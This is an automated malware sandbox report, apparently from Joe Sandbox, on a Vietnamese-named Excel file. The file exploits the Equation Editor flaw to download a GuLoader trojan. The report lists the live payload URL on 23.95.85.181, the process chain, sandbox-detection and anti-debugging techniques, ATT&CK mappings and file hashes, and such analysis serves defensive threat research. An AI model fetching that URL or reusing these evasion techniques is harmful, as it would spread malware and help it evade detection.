      Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
      Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsxVirustotal: Detection: 38%
      Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsxReversingLabs: Detection: 28%
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$#U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR212.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@6/21@0/1
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.695092285.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00405852 push ebx; ret
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004072B2 push cs; iretd
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0040796C push ecx; iretd
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0040772B push es; iretd
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004075F1 push ebx; iretd
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D1077 push 0BFD29CAh; retf FD29h
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003DA563 push edx; retf
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D8BA0 push edx; retf
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B843D push es; ret
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B15B3 push ebp; iretd
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B8BA0 push edx; retf
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

      Boot Survival:

      barindex
      Drops PE files to the user root directoryShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Tries to detect Any.runShow sources
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
      Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040C090 second address: 000000000040C090 instructions: 0x00000000 rdtsc 0x00000002 cmp al, FEh 0x00000004 xor eax, edx 0x00000006 cmp esi, 00000097h 0x0000000c dec edi 0x0000000d cmp di, 00EFh 0x00000012 movq mm7, mm5 0x00000015 jmp 00007F6370A86402h 0x00000017 cmp edi, 00000000h 0x0000001a jne 00007F6370A86328h 0x00000020 cmp bh, 00000057h 0x00000023 mov ebx, 42152221h 0x00000028 cmp dl, FFFFFF80h 0x0000002b xor ebx, DC00070Fh 0x00000031 cmp bh, 00000023h 0x00000034 add ebx, 289BD3ABh 0x0000003a cmp edx, 14h 0x0000003d psubw xmm6, xmm7 0x00000041 jmp 00007F6370A86401h 0x00000043 sub ebx, C670F8D9h 0x00000049 cmp esi, 5Eh 0x0000004c cmp bh, 00000021h 0x0000004f rdtsc
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 760Thread sleep time: -360000s >= -30000s
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D8304 rdtsc
      Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 9848
      Source: C:\Users\Public\vbc.exeSystem information queried: ModuleInformation
      Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
      Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Users\Public\vbc.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D8304 rdtsc
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D8C0F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D8C73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D3A50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D58BB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D3AB1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D788C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D788F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D7ECE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D39AB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D2F96 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B5837 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B8C73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B788F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B788C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B7ECE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B8BAC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B8BFF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D60CF LdrInitializeThunk,
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: vbc.exe, 00000009.00000002.695186981.0000000000A90000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: vbc.exe, 00000009.00000002.695186981.0000000000A90000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: vbc.exe, 00000009.00000002.695186981.0000000000A90000.00000002.00020000.sdmpBinary or memory string: Program Manager<

      Stealing of Sensitive Information:

      barindex
      GuLoader behavior detectedShow sources
      Source: Initial fileSignature Results: GuLoader behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsExploitation for Client Execution12Path InterceptionProcess Injection12Masquerading111OS Credential DumpingSecurity Software Discovery521Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion22Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion22Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol121SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx39%VirustotalBrowse
      #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx29%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\Public\vbc.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe36%VirustotalBrowse
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe21%ReversingLabsWin32.Trojan.Vebzenpak
      C:\Users\Public\vbc.exe36%VirustotalBrowse
      C:\Users\Public\vbc.exe21%ReversingLabsWin32.Trojan.Vebzenpak

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://23.95.85.181/0789/vbc.exe6%VirustotalBrowse
      http://23.95.85.181/0789/vbc.exe100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://23.95.85.181/0789/vbc.exetrue
      • 6%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkvbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmpfalse
        high
        http://www.icra.org/vocabulary/.vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://windowsmedia.com/redir/services.asp?WMPFriendly=truevbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://www.day.com/dam/1.0EA784B99.emf.0.drfalse
          high

          Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public

          IPDomainCountryFlagASNASN NameMalicious
          23.95.85.181
          unknownUnited States
          36352AS-COLOCROSSINGUStrue

          General Information

          Joe Sandbox Version:33.0.0 White Diamond
          Analysis ID:483661
          Start date:15.09.2021
          Start time:11:05:36
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 6m 7s
          Hypervisor based Inspection enabled:false
          Report type:light
          Sample file name:#U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
          Number of analysed new started processes analysed:8
          Number of new started drivers analysed:2
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.expl.evad.winXLSX@6/21@0/1
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 26.8% (good quality ratio 14.3%)
          • Quality average: 34.4%
          • Quality standard deviation: 37.7%
          HCA Information:
          • Successful, ratio: 61%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .xlsx
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Scroll down
          • Close Viewer
          Warnings:
          Show All
          • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, svchost.exe
          • TCP Packets have been reduced to 100
          • Report size getting too big, too many NtCreateFile calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          11:06:49API Interceptor40x Sleep call for process: EQNEDT32.EXE modified
          11:08:09API Interceptor6x Sleep call for process: vbc.exe modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          23.95.85.181ORDER RFQ1009202.xlsxGet hashmaliciousBrowse
          • 23.95.85.181/msn/vbc.exe

          Domains

          No context

          ASN

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          AS-COLOCROSSINGUS09142021_PDF.vbsGet hashmaliciousBrowse
          • 23.94.82.41
          Swift Mt103.xlsxGet hashmaliciousBrowse
          • 23.95.13.175
          vkb.xlsxGet hashmaliciousBrowse
          • 192.3.13.11
          Transfer Swift.xlsxGet hashmaliciousBrowse
          • 172.245.26.190
          ORDER 5172020.xlsxGet hashmaliciousBrowse
          • 198.12.84.109
          REF_MIDLGB34.xlsxGet hashmaliciousBrowse
          • 23.94.159.208
          proforma invoice.xlsxGet hashmaliciousBrowse
          • 192.3.141.149
          Swift_Mt103.xlsxGet hashmaliciousBrowse
          • 23.95.13.175
          PO-80722 .xlsxGet hashmaliciousBrowse
          • 198.12.84.109
          MT103-Swift Copy.xlsxGet hashmaliciousBrowse
          • 198.46.199.203
          Items_quote.xlsxGet hashmaliciousBrowse
          • 172.245.26.145
          Usd_transfer.xlsxGet hashmaliciousBrowse
          • 172.245.26.145
          REF_MIDLGB34.xlsxGet hashmaliciousBrowse
          • 23.94.159.208
          ORDER RFQ1009202.xlsxGet hashmaliciousBrowse
          • 23.95.85.181
          msn.xlsxGet hashmaliciousBrowse
          • 198.12.127.217
          swift.xlsxGet hashmaliciousBrowse
          • 198.46.199.171
          Additional Order Qty 197.xlsxGet hashmaliciousBrowse
          • 198.12.107.117
          DHL Cargo Arrival.xlsxGet hashmaliciousBrowse
          • 172.245.26.190
          Po2142021.xlsxGet hashmaliciousBrowse
          • 198.12.107.117
          UPDATED SOA - JUNE & JUULY & AUGUST.xlsxGet hashmaliciousBrowse
          • 192.3.146.254

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
          Category:downloaded
          Size (bytes):122880
          Entropy (8bit):6.286624517223784
          Encrypted:false
          SSDEEP:1536:yzqGcUKFGnMrpxAcbsasHpL9T8oOmhfIRorEjZyZt:fcnM1rQa2dRPrEtyZt
          MD5:451E4CD68C69C2C8B8FC93AD02E8754A
          SHA1:B87D041383FA59A21BFF9666756EFA2784282199
          SHA-256:E406C6674E19F2F3368E26AD4E6D672B190EA5DF8CB1B5E95C9E22FB8C80738B
          SHA-512:FE42A6AFBD37EC5D20EC0C22153489EE0CA4A636FE8312DBF9554BEBE7C6D3D0E9AD602C3A746304F150561650FB2A887CFC10B3AD727A2FAB0A72A5A9D11911
          Malicious:true
          Antivirus:
          • Antivirus: Joe Sandbox ML, Detection: 100%
          • Antivirus: Virustotal, Detection: 36%, Browse
          • Antivirus: ReversingLabs, Detection: 21%
          Reputation:low
          IE Cache URL:http://23.95.85.181/0789/vbc.exe
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......K.....................@....................@.................................`u......................................$...(...........................................................................(... .......L............................text...`........................... ..`.data...............................@....rsrc............ ..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1A0B8B0A.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
          Category:dropped
          Size (bytes):49744
          Entropy (8bit):7.99056926749243
          Encrypted:true
          SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
          MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
          SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
          SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
          SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F521389.jpeg
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
          Category:dropped
          Size (bytes):7006
          Entropy (8bit):7.000232770071406
          Encrypted:false
          SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
          MD5:971312D4A6C9BE9B496160215FE59C19
          SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
          SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
          SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\30D76811.jpeg
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
          Category:dropped
          Size (bytes):7006
          Entropy (8bit):7.000232770071406
          Encrypted:false
          SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
          MD5:971312D4A6C9BE9B496160215FE59C19
          SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
          SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
          SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\35493F6.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):84203
          Entropy (8bit):7.979766688932294
          Encrypted:false
          SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
          MD5:208FD40D2F72D9AED77A86A44782E9E2
          SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
          SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
          SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
          Malicious:false
          Reputation:moderate, very likely benign file
